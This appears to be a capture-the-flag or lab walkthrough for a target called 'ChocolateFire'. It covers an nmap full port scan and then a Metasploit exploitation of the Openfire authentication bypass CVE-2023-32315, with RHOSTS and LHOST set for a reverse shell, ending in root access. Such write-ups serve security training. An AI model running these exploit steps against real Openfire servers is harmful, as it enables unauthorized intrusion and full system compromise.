Skip to main content

ChocolateFire

1. Network Enumeration

Performing a Full Port Scan

export TARGET_IP=172.17.0.3
sudo nmap -p- $TARGET_IP

Scan Results:

The scan identifies multiple open ports, including SSH (22/tcp) and several XMPP-related services:

Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
7070/tcp open realserver
7777/tcp open cbt
9090/tcp open zeus-admin

2. Exploitation: Openfire Authentication Bypass (CVE-2023-32315)

Given the presence of Openfire, we check for known vulnerabilities. One such critical vulnerability is CVE-2023-32315, which allows for authentication bypass and remote code execution (RCE).

Using Metasploit to Exploit the Vulnerability

Metasploit contains an exploit module for this vulnerability. We proceed as follows:

  1. Launch Metasploit:

    msfconsole -q
  2. Search for Openfire exploits:

    msf6 > search openfire
  3. Select the relevant exploit module:

    msf6 > use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
  4. Configure the exploit options:

    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options
    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOSTS 172.17.0.3
    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1
  5. Execute the exploit:

    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

Upon successful exploitation, we confirm root access:

id
# id=0(root) gid=0(root) groups=0(root)